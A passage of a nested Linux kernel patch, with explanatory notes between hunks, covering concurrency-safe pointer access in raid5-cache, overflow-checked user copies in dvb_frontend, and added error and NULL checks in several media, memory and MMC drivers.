+@@ -363,7 +366,7 @@ void r5c_check_cached_full_stripe(struct r5conf *conf)
+ 	if (atomic_read(&conf->r5c_cached_full_stripes) >=
+ 	    min(R5C_FULL_STRIPE_FLUSH_BATCH(conf),
+ 		conf->chunk_sectors >> RAID5_STRIPE_SHIFT(conf)))
+-		r5l_wake_reclaim(conf->log, 0);
++		r5l_wake_reclaim(log, 0);
+ }
+ 
+ /*
+@@ -396,7 +399,7 @@ void r5c_check_cached_full_stripe(struct r5conf *conf)
+  */
+ static sector_t r5c_log_required_to_flush_cache(struct r5conf *conf)
+ {
+-	struct r5l_log *log = conf->log;
++	struct r5l_log *log = READ_ONCE(conf->log);
+ 
+ 	if (!r5c_is_writeback(log))
+ 		return 0;
+@@ -449,7 +452,7 @@ static inline void r5c_update_log_state(struct r5l_log *log)
+ void r5c_make_stripe_write_out(struct stripe_head *sh)
+ {
+ 	struct r5conf *conf = sh->raid_conf;
+-	struct r5l_log *log = conf->log;
++	struct r5l_log *log = READ_ONCE(conf->log);
+ 
+ 	BUG_ON(!r5c_is_writeback(log));
+ 
+@@ -491,7 +494,7 @@ static void r5c_handle_parity_cached(struct stripe_head *sh)
+  */
+ static void r5c_finish_cache_stripe(struct stripe_head *sh)
+ {
+-	struct r5l_log *log = sh->raid_conf->log;
++	struct r5l_log *log = READ_ONCE(sh->raid_conf->log);
+ 
+ 	if (log->r5c_journal_mode == R5C_JOURNAL_MODE_WRITE_THROUGH) {
+ 		BUG_ON(test_bit(STRIPE_R5C_CACHING, &sh->state));
+@@ -692,7 +695,7 @@ static void r5c_disable_writeback_async(struct work_struct *work)
+ 
+ 	/* wait for superblock change before suspend */
+ 	wait_event(mddev->sb_wait,
+-		   conf->log == NULL ||
++		   !READ_ONCE(conf->log) ||
+ 		   (!test_bit(MD_SB_CHANGE_PENDING, &mddev->sb_flags) &&
+ 		    (locked = mddev_trylock(mddev))));
+ 	if (locked) {
+@@ -1151,7 +1154,7 @@ static void r5l_run_no_space_stripes(struct r5l_log *log)
+ static sector_t r5c_calculate_new_cp(struct r5conf *conf)
+ {
+ 	struct stripe_head *sh;
+-	struct r5l_log *log = conf->log;
++	struct r5l_log *log = READ_ONCE(conf->log);
+ 	sector_t new_cp;
+ 	unsigned long flags;
+ 
+@@ -1159,12 +1162,12 @@ static sector_t r5c_calculate_new_cp(struct r5conf *conf)
+ 		return log->next_checkpoint;
+ 
+ 	spin_lock_irqsave(&log->stripe_in_journal_lock, flags);
+-	if (list_empty(&conf->log->stripe_in_journal_list)) {
++	if (list_empty(&log->stripe_in_journal_list)) {
+ 		/* all stripes flushed */
+ 		spin_unlock_irqrestore(&log->stripe_in_journal_lock, flags);
+ 		return log->next_checkpoint;
+ 	}
+-	sh = list_first_entry(&conf->log->stripe_in_journal_list,
++	sh = list_first_entry(&log->stripe_in_journal_list,
+ 			      struct stripe_head, r5c);
+ 	new_cp = sh->log_start;
+ 	spin_unlock_irqrestore(&log->stripe_in_journal_lock, flags);
+@@ -1399,7 +1402,7 @@ void r5c_flush_cache(struct r5conf *conf, int num)
+ 	struct stripe_head *sh, *next;
+ 
+ 	lockdep_assert_held(&conf->device_lock);
+-	if (!conf->log)
++	if (!READ_ONCE(conf->log))
+ 		return;
+ 
+ 	count = 0;
+@@ -1420,7 +1423,7 @@ void r5c_flush_cache(struct r5conf *conf, int num)
+ 
+ static void r5c_do_reclaim(struct r5conf *conf)
+ {
+-	struct r5l_log *log = conf->log;
++	struct r5l_log *log = READ_ONCE(conf->log);
+ 	struct stripe_head *sh;
+ 	int count = 0;
+ 	unsigned long flags;
+@@ -1549,7 +1552,7 @@ static void r5l_reclaim_thread(struct md_thread *thread)
+ {
+ 	struct mddev *mddev = thread->mddev;
+ 	struct r5conf *conf = mddev->private;
+-	struct r5l_log *log = conf->log;
++	struct r5l_log *log = READ_ONCE(conf->log);
+ 
+ 	if (!log)
+ 		return;
+@@ -1589,7 +1592,7 @@ void r5l_quiesce(struct r5l_log *log, int quiesce)
+ 
+ bool r5l_log_disk_error(struct r5conf *conf)
+ {
+-	struct r5l_log *log = conf->log;
++	struct r5l_log *log = READ_ONCE(conf->log);
+ 
+ 	/* don't allow write if journal disk is missing */
+ 	if (!log)
+@@ -2633,7 +2636,7 @@ int r5c_try_caching_write(struct r5conf *conf,
+ 			  struct stripe_head_state *s,
+ 			  int disks)
+ {
+-	struct r5l_log *log = conf->log;
++	struct r5l_log *log = READ_ONCE(conf->log);
+ 	int i;
+ 	struct r5dev *dev;
+ 	int to_cache = 0;
+@@ -2800,7 +2803,7 @@ void r5c_finish_stripe_write_out(struct r5conf *conf,
+ 				 struct stripe_head *sh,
+ 				 struct stripe_head_state *s)
+ {
+-	struct r5l_log *log = conf->log;
++	struct r5l_log *log = READ_ONCE(conf->log);
+ 	int i;
+ 	int do_wakeup = 0;
+ 	sector_t tree_index;
+@@ -2939,7 +2942,7 @@ int r5c_cache_data(struct r5l_log *log, struct stripe_head *sh)
+ /* check whether this big stripe is in write back cache. */
+ bool r5c_big_stripe_cached(struct r5conf *conf, sector_t sect)
+ {
+-	struct r5l_log *log = conf->log;
++	struct r5l_log *log = READ_ONCE(conf->log);
+ 	sector_t tree_index;
+ 	void *slot;
+ 
+@@ -3047,14 +3050,14 @@ int r5l_start(struct r5l_log *log)
+ void r5c_update_on_rdev_error(struct mddev *mddev, struct md_rdev *rdev)
+ {
+ 	struct r5conf *conf = mddev->private;
+-	struct r5l_log *log = conf->log;
++	struct r5l_log *log = READ_ONCE(conf->log);
+ 
+ 	if (!log)
+ 		return;
+ 
+ 	if ((raid5_calc_degraded(conf) > 0 ||
+ 	     test_bit(Journal, &rdev->flags)) &&
+-	    conf->log->r5c_journal_mode == R5C_JOURNAL_MODE_WRITE_BACK)
++	    log->r5c_journal_mode == R5C_JOURNAL_MODE_WRITE_BACK)
+ 		schedule_work(&log->disable_writeback_work);
+ }
+ 
+@@ -3143,7 +3146,7 @@ int r5l_init_log(struct r5conf *conf, struct md_rdev *rdev)
+ 	spin_lock_init(&log->stripe_in_journal_lock);
+ 	atomic_set(&log->stripe_in_journal_count, 0);
+ 
+-	conf->log = log;
++	WRITE_ONCE(conf->log, log);
+ 
+ 	set_bit(MD_HAS_JOURNAL, &conf->mddev->flags);
+ 	return 0;
+@@ -3171,7 +3174,7 @@ void r5l_exit_log(struct r5conf *conf)
+ 	 * 'reconfig_mutex' is held by the caller; set 'conf->log' to NULL to
+ 	 * ensure disable_writeback_work wakes up and exits.
+ 	 */
+-	conf->log = NULL;
++	WRITE_ONCE(conf->log, NULL);
+ 	wake_up(&conf->mddev->sb_wait);
+ 	flush_work(&log->disable_writeback_work);
+ 
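
The pattern applied throughout this file: conf->log is written under the writer's lock but read from contexts that do not hold it, so every lockless reader samples the pointer once with READ_ONCE() into a local and uses only that copy, while the writer publishes and clears with WRITE_ONCE(). This stops the compiler from re-loading the pointer mid-function and prevents torn accesses. A minimal sketch:

#include <linux/compiler.h>
#include <linux/types.h>

struct log;
struct conf { struct log *log; };

static void publish(struct conf *c, struct log *l)
{
	WRITE_ONCE(c->log, l);			/* paired with READ_ONCE() */
}

static bool log_present(struct conf *c)
{
	struct log *l = READ_ONCE(c->log);	/* sample exactly once */

	return l != NULL;
}
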
+diff --git a/drivers/media/dvb-core/dvb_frontend.c b/drivers/media/dvb-core/dvb_frontend.c
+index fce0e20940780..a1a3dbb0e7388 100644
+--- a/drivers/media/dvb-core/dvb_frontend.c
++++ b/drivers/media/dvb-core/dvb_frontend.c
+@@ -2160,7 +2160,8 @@ static int dvb_frontend_handle_compat_ioctl(struct file *file, unsigned int cmd,
+ 		if (!tvps->num || (tvps->num > DTV_IOCTL_MAX_MSGS))
+ 			return -EINVAL;
+ 
+-		tvp = memdup_user(compat_ptr(tvps->props), tvps->num * sizeof(*tvp));
++		tvp = memdup_array_user(compat_ptr(tvps->props),
++					tvps->num, sizeof(*tvp));
+ 		if (IS_ERR(tvp))
+ 			return PTR_ERR(tvp);
+ 
+@@ -2191,7 +2192,8 @@ static int dvb_frontend_handle_compat_ioctl(struct file *file, unsigned int cmd,
+ 		if (!tvps->num || (tvps->num > DTV_IOCTL_MAX_MSGS))
+ 			return -EINVAL;
+ 
+-		tvp = memdup_user(compat_ptr(tvps->props), tvps->num * sizeof(*tvp));
++		tvp = memdup_array_user(compat_ptr(tvps->props),
++					tvps->num, sizeof(*tvp));
+ 		if (IS_ERR(tvp))
+ 			return PTR_ERR(tvp);
+ 
+@@ -2368,7 +2370,8 @@ static int dvb_get_property(struct dvb_frontend *fe, struct file *file,
+ 	if (!tvps->num || tvps->num > DTV_IOCTL_MAX_MSGS)
+ 		return -EINVAL;
+ 
+-	tvp = memdup_user((void __user *)tvps->props, tvps->num * sizeof(*tvp));
++	tvp = memdup_array_user((void __user *)tvps->props,
++				tvps->num, sizeof(*tvp));
+ 	if (IS_ERR(tvp))
+ 		return PTR_ERR(tvp);
+ 
+@@ -2446,7 +2449,8 @@ static int dvb_frontend_handle_ioctl(struct file *file,
+ 		if (!tvps->num || (tvps->num > DTV_IOCTL_MAX_MSGS))
+ 			return -EINVAL;
+ 
+-		tvp = memdup_user((void __user *)tvps->props, tvps->num * sizeof(*tvp));
++		tvp = memdup_array_user((void __user *)tvps->props,
++					tvps->num, sizeof(*tvp));
+ 		if (IS_ERR(tvp))
+ 			return PTR_ERR(tvp);
+ 
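
The helper swap above closes an arithmetic hole: memdup_array_user() checks the n * size multiplication for overflow before copying, so a huge count from userspace cannot wrap the size and under-allocate the buffer the way a hand-rolled memdup_user(ptr, n * size) can, notably on 32-bit kernels. A sketch of the usage (struct and names illustrative):

#include <linux/string.h>	/* memdup_array_user() */
#include <linux/types.h>

struct prop { __u32 cmd; __u32 data; };

static struct prop *copy_props(const void __user *uptr, unsigned int num)
{
	/* returns ERR_PTR(-EOVERFLOW) if num * sizeof() would overflow,
	 * or the usual -ENOMEM/-EFAULT error pointers */
	return memdup_array_user(uptr, num, sizeof(struct prop));
}
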
+diff --git a/drivers/media/pci/cx23885/cx23885-video.c b/drivers/media/pci/cx23885/cx23885-video.c
+index 9af2c5596121c..51d7d720ec48b 100644
+--- a/drivers/media/pci/cx23885/cx23885-video.c
++++ b/drivers/media/pci/cx23885/cx23885-video.c
+@@ -1354,6 +1354,10 @@ int cx23885_video_register(struct cx23885_dev *dev)
+ 	/* register Video device */
+ 	dev->video_dev = cx23885_vdev_init(dev, dev->pci,
+ 		&cx23885_video_template, "video");
++	if (!dev->video_dev) {
++		err = -ENOMEM;
++		goto fail_unreg;
++	}
+ 	dev->video_dev->queue = &dev->vb2_vidq;
+ 	dev->video_dev->device_caps = V4L2_CAP_READWRITE | V4L2_CAP_STREAMING |
+ 				      V4L2_CAP_AUDIO | V4L2_CAP_VIDEO_CAPTURE;
+@@ -1382,6 +1386,10 @@ int cx23885_video_register(struct cx23885_dev *dev)
+ 	/* register VBI device */
+ 	dev->vbi_dev = cx23885_vdev_init(dev, dev->pci,
+ 		&cx23885_vbi_template, "vbi");
++	if (!dev->vbi_dev) {
++		err = -ENOMEM;
++		goto fail_unreg;
++	}
+ 	dev->vbi_dev->queue = &dev->vb2_vbiq;
+ 	dev->vbi_dev->device_caps = V4L2_CAP_READWRITE | V4L2_CAP_STREAMING |
+ 				    V4L2_CAP_AUDIO | V4L2_CAP_VBI_CAPTURE;
+diff --git a/drivers/media/pci/solo6x10/solo6x10-offsets.h b/drivers/media/pci/solo6x10/solo6x10-offsets.h
+index f414ee1316f29..fdbb817e63601 100644
+--- a/drivers/media/pci/solo6x10/solo6x10-offsets.h
++++ b/drivers/media/pci/solo6x10/solo6x10-offsets.h
+@@ -57,16 +57,16 @@
+ #define SOLO_MP4E_EXT_ADDR(__solo) \
+ 	(SOLO_EREF_EXT_ADDR(__solo) + SOLO_EREF_EXT_AREA(__solo))
+ #define SOLO_MP4E_EXT_SIZE(__solo) \
+-	max((__solo->nr_chans * 0x00080000),				\
+-	    min(((__solo->sdram_size - SOLO_MP4E_EXT_ADDR(__solo)) -	\
+-		 __SOLO_JPEG_MIN_SIZE(__solo)), 0x00ff0000))
++	clamp(__solo->sdram_size - SOLO_MP4E_EXT_ADDR(__solo) -	\
++	      __SOLO_JPEG_MIN_SIZE(__solo),			\
++	      __solo->nr_chans * 0x00080000, 0x00ff0000)
+ 
+ #define __SOLO_JPEG_MIN_SIZE(__solo)		(__solo->nr_chans * 0x00080000)
+ #define SOLO_JPEG_EXT_ADDR(__solo) \
+ 		(SOLO_MP4E_EXT_ADDR(__solo) + SOLO_MP4E_EXT_SIZE(__solo))
+ #define SOLO_JPEG_EXT_SIZE(__solo) \
+-	max(__SOLO_JPEG_MIN_SIZE(__solo),				\
+-	    min((__solo->sdram_size - SOLO_JPEG_EXT_ADDR(__solo)), 0x00ff0000))
++	clamp(__solo->sdram_size - SOLO_JPEG_EXT_ADDR(__solo),	\
++	      __SOLO_JPEG_MIN_SIZE(__solo), 0x00ff0000)
+ 
+ #define SOLO_SDRAM_END(__solo) \
+ 	(SOLO_JPEG_EXT_ADDR(__solo) + SOLO_JPEG_EXT_SIZE(__solo))
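
The macro rewrite above is a pure identity: max(lo, min(x, hi)) is clamp(x, lo, hi) from <linux/minmax.h>. The clamp() spelling names the bounds explicitly and avoids the classic mistake of swapping the min/max nesting. A sketch:

#include <linux/minmax.h>

/* region size limited to [lo, hi]: identical to max(lo, min(avail, hi)) */
static unsigned int region_size(unsigned int avail,
				unsigned int lo, unsigned int hi)
{
	return clamp(avail, lo, hi);
}
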
+diff --git a/drivers/media/platform/qcom/venus/pm_helpers.c b/drivers/media/platform/qcom/venus/pm_helpers.c
+index 48c9084bb4dba..a1b127caa90a7 100644
+--- a/drivers/media/platform/qcom/venus/pm_helpers.c
++++ b/drivers/media/platform/qcom/venus/pm_helpers.c
+@@ -870,7 +870,7 @@ static int vcodec_domains_get(struct venus_core *core)
+ 		pd = dev_pm_domain_attach_by_name(dev,
+ 						  res->vcodec_pmdomains[i]);
+ 		if (IS_ERR_OR_NULL(pd))
+-			return PTR_ERR(pd) ? : -ENODATA;
++			return pd ? PTR_ERR(pd) : -ENODATA;
+ 		core->pmdomains[i] = pd;
+ 	}
+ 
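
Context for this one-liner: PTR_ERR(NULL) evaluates to 0, so the old `PTR_ERR(pd) ? : -ENODATA` mapped NULL to -ENODATA only by that accident; testing the pointer itself states the intent directly. A sketch of the pattern (example_get_dev() is a hypothetical getter that may return NULL or an ERR_PTR):

#include <linux/err.h>

struct device;
struct device *example_get_dev(void);	/* hypothetical */

static int attach_thing(void)
{
	struct device *dev = example_get_dev();

	if (IS_ERR_OR_NULL(dev))
		return dev ? PTR_ERR(dev) : -ENODATA;

	/* ... use dev ... */
	return 0;
}
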
+diff --git a/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_enc.c b/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_enc.c
+index f62703cebb77c..4b4c129c09e70 100644
+--- a/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_enc.c
++++ b/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_enc.c
+@@ -1297,7 +1297,7 @@ static int enc_post_frame_start(struct s5p_mfc_ctx *ctx)
+ 	if (ctx->state == MFCINST_FINISHING && ctx->ref_queue_cnt == 0)
+ 		src_ready = false;
+ 	if (!src_ready || ctx->dst_queue_cnt == 0)
+-		clear_work_bit(ctx);
++		clear_work_bit_irqsave(ctx);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/media/radio/radio-isa.c b/drivers/media/radio/radio-isa.c
+index c591c0851fa28..ad49151f5ff09 100644
+--- a/drivers/media/radio/radio-isa.c
++++ b/drivers/media/radio/radio-isa.c
+@@ -36,7 +36,7 @@ static int radio_isa_querycap(struct file *file, void  *priv,
+ 
+ 	strscpy(v->driver, isa->drv->driver.driver.name, sizeof(v->driver));
+ 	strscpy(v->card, isa->drv->card, sizeof(v->card));
+-	snprintf(v->bus_info, sizeof(v->bus_info), "ISA:%s", isa->v4l2_dev.name);
++	snprintf(v->bus_info, sizeof(v->bus_info), "ISA:%s", dev_name(isa->v4l2_dev.dev));
+ 	return 0;
+ }
+ 
+diff --git a/drivers/memory/stm32-fmc2-ebi.c b/drivers/memory/stm32-fmc2-ebi.c
+index ffec26a99313b..5c387d32c078f 100644
+--- a/drivers/memory/stm32-fmc2-ebi.c
++++ b/drivers/memory/stm32-fmc2-ebi.c
+@@ -179,8 +179,11 @@ static int stm32_fmc2_ebi_check_mux(struct stm32_fmc2_ebi *ebi,
+ 				    int cs)
+ {
+ 	u32 bcr;
++	int ret;
+ 
+-	regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	ret = regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	if (ret)
++		return ret;
+ 
+ 	if (bcr & FMC2_BCR_MTYP)
+ 		return 0;
+@@ -193,8 +196,11 @@ static int stm32_fmc2_ebi_check_waitcfg(struct stm32_fmc2_ebi *ebi,
+ 					int cs)
+ {
+ 	u32 bcr, val = FIELD_PREP(FMC2_BCR_MTYP, FMC2_BCR_MTYP_NOR);
++	int ret;
+ 
+-	regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	ret = regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	if (ret)
++		return ret;
+ 
+ 	if ((bcr & FMC2_BCR_MTYP) == val && bcr & FMC2_BCR_BURSTEN)
+ 		return 0;
+@@ -207,8 +213,11 @@ static int stm32_fmc2_ebi_check_sync_trans(struct stm32_fmc2_ebi *ebi,
+ 					   int cs)
+ {
+ 	u32 bcr;
++	int ret;
+ 
+-	regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	ret = regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	if (ret)
++		return ret;
+ 
+ 	if (bcr & FMC2_BCR_BURSTEN)
+ 		return 0;
+@@ -221,8 +230,11 @@ static int stm32_fmc2_ebi_check_async_trans(struct stm32_fmc2_ebi *ebi,
+ 					    int cs)
+ {
+ 	u32 bcr;
++	int ret;
+ 
+-	regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	ret = regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	if (ret)
++		return ret;
+ 
+ 	if (!(bcr & FMC2_BCR_BURSTEN) || !(bcr & FMC2_BCR_CBURSTRW))
+ 		return 0;
+@@ -235,8 +247,11 @@ static int stm32_fmc2_ebi_check_cpsize(struct stm32_fmc2_ebi *ebi,
+ 				       int cs)
+ {
+ 	u32 bcr, val = FIELD_PREP(FMC2_BCR_MTYP, FMC2_BCR_MTYP_PSRAM);
++	int ret;
+ 
+-	regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	ret = regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	if (ret)
++		return ret;
+ 
+ 	if ((bcr & FMC2_BCR_MTYP) == val && bcr & FMC2_BCR_BURSTEN)
+ 		return 0;
+@@ -249,12 +264,18 @@ static int stm32_fmc2_ebi_check_address_hold(struct stm32_fmc2_ebi *ebi,
+ 					     int cs)
+ {
+ 	u32 bcr, bxtr, val = FIELD_PREP(FMC2_BXTR_ACCMOD, FMC2_BXTR_EXTMOD_D);
++	int ret;
++
++	ret = regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	if (ret)
++		return ret;
+ 
+-	regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
+ 	if (prop->reg_type == FMC2_REG_BWTR)
+-		regmap_read(ebi->regmap, FMC2_BWTR(cs), &bxtr);
++		ret = regmap_read(ebi->regmap, FMC2_BWTR(cs), &bxtr);
+ 	else
+-		regmap_read(ebi->regmap, FMC2_BTR(cs), &bxtr);
++		ret = regmap_read(ebi->regmap, FMC2_BTR(cs), &bxtr);
++	if (ret)
++		return ret;
+ 
+ 	if ((!(bcr & FMC2_BCR_BURSTEN) || !(bcr & FMC2_BCR_CBURSTRW)) &&
+ 	    ((bxtr & FMC2_BXTR_ACCMOD) == val || bcr & FMC2_BCR_MUXEN))
+@@ -268,12 +289,19 @@ static int stm32_fmc2_ebi_check_clk_period(struct stm32_fmc2_ebi *ebi,
+ 					   int cs)
+ {
+ 	u32 bcr, bcr1;
++	int ret;
+ 
+-	regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
+-	if (cs)
+-		regmap_read(ebi->regmap, FMC2_BCR1, &bcr1);
+-	else
++	ret = regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	if (ret)
++		return ret;
++
++	if (cs) {
++		ret = regmap_read(ebi->regmap, FMC2_BCR1, &bcr1);
++		if (ret)
++			return ret;
++	} else {
+ 		bcr1 = bcr;
++	}
+ 
+ 	if (bcr & FMC2_BCR_BURSTEN && (!cs || !(bcr1 & FMC2_BCR1_CCLKEN)))
+ 		return 0;
+@@ -305,12 +333,18 @@ static u32 stm32_fmc2_ebi_ns_to_clk_period(struct stm32_fmc2_ebi *ebi,
+ {
+ 	u32 nb_clk_cycles = stm32_fmc2_ebi_ns_to_clock_cycles(ebi, cs, setup);
+ 	u32 bcr, btr, clk_period;
++	int ret;
++
++	ret = regmap_read(ebi->regmap, FMC2_BCR1, &bcr);
++	if (ret)
++		return ret;
+ 
+-	regmap_read(ebi->regmap, FMC2_BCR1, &bcr);
+ 	if (bcr & FMC2_BCR1_CCLKEN || !cs)
+-		regmap_read(ebi->regmap, FMC2_BTR1, &btr);
++		ret = regmap_read(ebi->regmap, FMC2_BTR1, &btr);
+ 	else
+-		regmap_read(ebi->regmap, FMC2_BTR(cs), &btr);
++		ret = regmap_read(ebi->regmap, FMC2_BTR(cs), &btr);
++	if (ret)
++		return ret;
+ 
+ 	clk_period = FIELD_GET(FMC2_BTR_CLKDIV, btr) + 1;
+ 
+@@ -569,11 +603,16 @@ static int stm32_fmc2_ebi_set_address_setup(struct stm32_fmc2_ebi *ebi,
+ 	if (ret)
+ 		return ret;
+ 
+-	regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	ret = regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	if (ret)
++		return ret;
++
+ 	if (prop->reg_type == FMC2_REG_BWTR)
+-		regmap_read(ebi->regmap, FMC2_BWTR(cs), &bxtr);
++		ret = regmap_read(ebi->regmap, FMC2_BWTR(cs), &bxtr);
+ 	else
+-		regmap_read(ebi->regmap, FMC2_BTR(cs), &bxtr);
++		ret = regmap_read(ebi->regmap, FMC2_BTR(cs), &bxtr);
++	if (ret)
++		return ret;
+ 
+ 	if ((bxtr & FMC2_BXTR_ACCMOD) == val || bcr & FMC2_BCR_MUXEN)
+ 		val = clamp_val(setup, 1, FMC2_BXTR_ADDSET_MAX);
+@@ -691,11 +730,14 @@ static int stm32_fmc2_ebi_set_max_low_pulse(struct stm32_fmc2_ebi *ebi,
+ 					    int cs, u32 setup)
+ {
+ 	u32 old_val, new_val, pcscntr;
++	int ret;
+ 
+ 	if (setup < 1)
+ 		return 0;
+ 
+-	regmap_read(ebi->regmap, FMC2_PCSCNTR, &pcscntr);
++	ret = regmap_read(ebi->regmap, FMC2_PCSCNTR, &pcscntr);
++	if (ret)
++		return ret;
+ 
+ 	/* Enable counter for the bank */
+ 	regmap_update_bits(ebi->regmap, FMC2_PCSCNTR,
+@@ -942,17 +984,20 @@ static void stm32_fmc2_ebi_disable_bank(struct stm32_fmc2_ebi *ebi, int cs)
+ 	regmap_update_bits(ebi->regmap, FMC2_BCR(cs), FMC2_BCR_MBKEN, 0);
+ }
+ 
+-static void stm32_fmc2_ebi_save_setup(struct stm32_fmc2_ebi *ebi)
++static int stm32_fmc2_ebi_save_setup(struct stm32_fmc2_ebi *ebi)
+ {
+ 	unsigned int cs;
++	int ret;
+ 
+ 	for (cs = 0; cs < FMC2_MAX_EBI_CE; cs++) {
+-		regmap_read(ebi->regmap, FMC2_BCR(cs), &ebi->bcr[cs]);
+-		regmap_read(ebi->regmap, FMC2_BTR(cs), &ebi->btr[cs]);
+-		regmap_read(ebi->regmap, FMC2_BWTR(cs), &ebi->bwtr[cs]);
++		ret = regmap_read(ebi->regmap, FMC2_BCR(cs), &ebi->bcr[cs]);
++		ret |= regmap_read(ebi->regmap, FMC2_BTR(cs), &ebi->btr[cs]);
++		ret |= regmap_read(ebi->regmap, FMC2_BWTR(cs), &ebi->bwtr[cs]);
++		if (ret)
++			return ret;
+ 	}
+ 
+-	regmap_read(ebi->regmap, FMC2_PCSCNTR, &ebi->pcscntr);
++	return regmap_read(ebi->regmap, FMC2_PCSCNTR, &ebi->pcscntr);
+ }
+ 
+ static void stm32_fmc2_ebi_set_setup(struct stm32_fmc2_ebi *ebi)
+@@ -981,22 +1026,29 @@ static void stm32_fmc2_ebi_disable_banks(struct stm32_fmc2_ebi *ebi)
+ }
+ 
+ /* The NWAIT signal cannot be connected to both the EBI and NAND controllers */
+-static bool stm32_fmc2_ebi_nwait_used_by_ctrls(struct stm32_fmc2_ebi *ebi)
++static int stm32_fmc2_ebi_nwait_used_by_ctrls(struct stm32_fmc2_ebi *ebi)
+ {
++	struct device *dev = ebi->dev;
+ 	unsigned int cs;
+ 	u32 bcr;
++	int ret;
+ 
+ 	for (cs = 0; cs < FMC2_MAX_EBI_CE; cs++) {
+ 		if (!(ebi->bank_assigned & BIT(cs)))
+ 			continue;
+ 
+-		regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++		ret = regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++		if (ret)
++			return ret;
++
+ 		if ((bcr & FMC2_BCR_WAITEN || bcr & FMC2_BCR_ASYNCWAIT) &&
+-		    ebi->bank_assigned & BIT(FMC2_NAND))
+-			return true;
++		    ebi->bank_assigned & BIT(FMC2_NAND)) {
++			dev_err(dev, "NWAIT signal connected to EBI and NAND controllers\n");
++			return -EINVAL;
++		}
+ 	}
+ 
+-	return false;
++	return 0;
+ }
+ 
+ static void stm32_fmc2_ebi_enable(struct stm32_fmc2_ebi *ebi)
+@@ -1083,10 +1135,9 @@ static int stm32_fmc2_ebi_parse_dt(struct stm32_fmc2_ebi *ebi)
+ 		return -ENODEV;
+ 	}
+ 
+-	if (stm32_fmc2_ebi_nwait_used_by_ctrls(ebi)) {
+-		dev_err(dev, "NWAIT signal connected to EBI and NAND controllers\n");
+-		return -EINVAL;
+-	}
++	ret = stm32_fmc2_ebi_nwait_used_by_ctrls(ebi);
++	if (ret)
++		return ret;
+ 
+ 	stm32_fmc2_ebi_enable(ebi);
+ 
+@@ -1131,7 +1182,10 @@ static int stm32_fmc2_ebi_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto err_release;
+ 
+-	stm32_fmc2_ebi_save_setup(ebi);
++	ret = stm32_fmc2_ebi_save_setup(ebi);
++	if (ret)
++		goto err_release;
++
+ 	platform_set_drvdata(pdev, ebi);
+ 
+ 	return 0;
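
The recurring shape in this file: regmap_read() returns a status (bus transfers can fail) and leaves the output value unset on error, so register contents must not be interpreted before the return code is checked. A minimal sketch of the checked-read wrapper all the hunks above imply:

#include <linux/regmap.h>

static int read_reg_checked(struct regmap *map, unsigned int reg, u32 *out)
{
	unsigned int val;
	int ret;

	ret = regmap_read(map, reg, &val);
	if (ret)
		return ret;	/* do not touch *out on failure */

	*out = val;
	return 0;
}
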
+diff --git a/drivers/memory/tegra/tegra186.c b/drivers/memory/tegra/tegra186.c
+index 7bb73f06fad3e..fd6f5e2e01a28 100644
+--- a/drivers/memory/tegra/tegra186.c
++++ b/drivers/memory/tegra/tegra186.c
+@@ -74,6 +74,9 @@ static void tegra186_mc_client_sid_override(struct tegra_mc *mc,
+ {
+ 	u32 value, old;
+ 
++	if (client->regs.sid.security == 0 && client->regs.sid.override == 0)
++		return;
++
+ 	value = readl(mc->regs + client->regs.sid.security);
+ 	if ((value & MC_SID_STREAMID_SECURITY_OVERRIDE) == 0) {
+ 		/*
+diff --git a/drivers/mmc/core/mmc_test.c b/drivers/mmc/core/mmc_test.c
+index 155ce2bdfe622..dbbcbdeab6c51 100644
+--- a/drivers/mmc/core/mmc_test.c
++++ b/drivers/mmc/core/mmc_test.c
+@@ -3109,13 +3109,13 @@ static ssize_t mtf_test_write(struct file *file, const char __user *buf,
+ 	test->buffer = kzalloc(BUFFER_SIZE, GFP_KERNEL);
+ #ifdef CONFIG_HIGHMEM
+ 	test->highmem = alloc_pages(GFP_KERNEL | __GFP_HIGHMEM, BUFFER_ORDER);
++	if (!test->highmem) {
++		count = -ENOMEM;
++		goto free_test_buffer;
++	}
+ #endif
+ 
+-#ifdef CONFIG_HIGHMEM
+-	if (test->buffer && test->highmem) {
+-#else
+ 	if (test->buffer) {
+-#endif
+ 		mutex_lock(&mmc_test_lock);
+ 		mmc_test_run(test, testcase);
+ 		mutex_unlock(&mmc_test_lock);
+@@ -3123,6 +3123,7 @@ static ssize_t mtf_test_write(struct file *file, const char __user *buf,
+ 
+ #ifdef CONFIG_HIGHMEM
+ 	__free_pages(test->highmem, BUFFER_ORDER);
++free_test_buffer:
+ #endif
+ 	kfree(test->buffer);
+ 	kfree(test);
+diff --git a/drivers/mmc/host/dw_mmc.c b/drivers/mmc/host/dw_mmc.c
+index c78bbc22e0d1e..a0ccf88876f98 100644
+--- a/drivers/mmc/host/dw_mmc.c
++++ b/drivers/mmc/host/dw_mmc.c
+@@ -3295,6 +3295,10 @@ int dw_mci_probe(struct dw_mci *host)
+ 	host->biu_clk = devm_clk_get(host->dev, "biu");
+ 	if (IS_ERR(host->biu_clk)) {
+ 		dev_dbg(host->dev, "biu clock not available\n");
++		ret = PTR_ERR(host->biu_clk);
++		if (ret == -EPROBE_DEFER)
++			return ret;
++
+ 	} else {
+ 		ret = clk_prepare_enable(host->biu_clk);
+ 		if (ret) {
+@@ -3306,6 +3310,10 @@ int dw_mci_probe(struct dw_mci *host)
